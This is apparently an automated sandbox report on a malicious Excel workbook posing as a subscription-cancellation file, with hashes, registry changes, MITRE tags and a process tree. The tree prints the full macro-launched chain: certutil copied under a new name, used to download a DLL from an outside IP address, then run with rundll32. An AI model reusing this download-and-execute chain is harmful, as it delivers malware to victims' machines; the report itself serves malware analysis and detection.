cancel_sub_VCP1234567890123.xlsb

General
Target

cancel_sub_VCP1234567890123.xlsb

Filesize

123KB

Completed

10-06-2021 19:17

Score
10 /10
MD5

9e1ee4a42c381eabcf2cde38a1aae7c9

SHA1

015bb306d9e54001d433b3ac2e7212b864f54ae2

SHA256

fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config

Extracted

Language xlm4.0
Source
Signatures 9

Filter: none

Defense Evasion
Discovery
  • Process spawned unexpected child process
    cmd.execmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process892332cmd.exeEXCEL.EXE
    Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process412332cmd.exeEXCEL.EXE
  • Executes dropped EXE
    TTObk2.exe

    Reported IOCs

    pidprocess
    1696TTObk2.exe
  • Loads dropped DLL
    EXCEL.EXE

    Reported IOCs

    pidprocess
    332EXCEL.EXE
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessorEXCEL.EXE
  • Modifies Internet Explorer settings
    EXCEL.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\ToolbarEXCEL.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"EXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExtEXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNoteEXCEL.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"EXCEL.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"EXCEL.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"EXCEL.EXE
    Key created\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelEXCEL.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"EXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pidprocess
    332EXCEL.EXE
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pidprocess
    332EXCEL.EXE
    332EXCEL.EXE
    332EXCEL.EXE
    332EXCEL.EXE
    332EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    EXCEL.EXEcmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 332 wrote to memory of 892332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 892332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 892332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 892332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 1696332EXCEL.EXETTObk2.exe
    PID 332 wrote to memory of 1696332EXCEL.EXETTObk2.exe
    PID 332 wrote to memory of 1696332EXCEL.EXETTObk2.exe
    PID 332 wrote to memory of 1696332EXCEL.EXETTObk2.exe
    PID 332 wrote to memory of 412332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 412332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 412332EXCEL.EXEcmd.exe
    PID 332 wrote to memory of 412332EXCEL.EXEcmd.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
    PID 412 wrote to memory of 2036412cmd.exerundll32.exe
Processes 5
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb
    Loads dropped DLL
    Enumerates system info in registry
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:332
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:892
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:1696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:412
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2036
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\ProgramData\TTObk2\TTObk2.exe

                        MD5

                        7b973145f7e1b59330ca4dd1f86b3d55

                        SHA1

                        10ce9174bff4856083e6adad0094a798ced2c079

                        SHA256

                        589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

                        SHA512

                        1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

                      • C:\programdata\TTObk2\TTObk2.exe

                        MD5

                        7b973145f7e1b59330ca4dd1f86b3d55

                        SHA1

                        10ce9174bff4856083e6adad0094a798ced2c079

                        SHA256

                        589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

                        SHA512

                        1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

                      • \ProgramData\TTObk2\TTObk2.exe

                        MD5

                        7b973145f7e1b59330ca4dd1f86b3d55

                        SHA1

                        10ce9174bff4856083e6adad0094a798ced2c079

                        SHA256

                        589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

                        SHA512

                        1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

                      • memory/332-59-0x000000002FD71000-0x000000002FD74000-memory.dmp

                      • memory/332-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      • memory/332-60-0x0000000071211000-0x0000000071213000-memory.dmp

                      • memory/412-68-0x0000000000000000-mapping.dmp

                      • memory/892-62-0x0000000000000000-mapping.dmp

                      • memory/1696-65-0x0000000000000000-mapping.dmp

                      • memory/1696-67-0x0000000075FF1000-0x0000000075FF3000-memory.dmp

                      • memory/2036-69-0x0000000000000000-mapping.dmp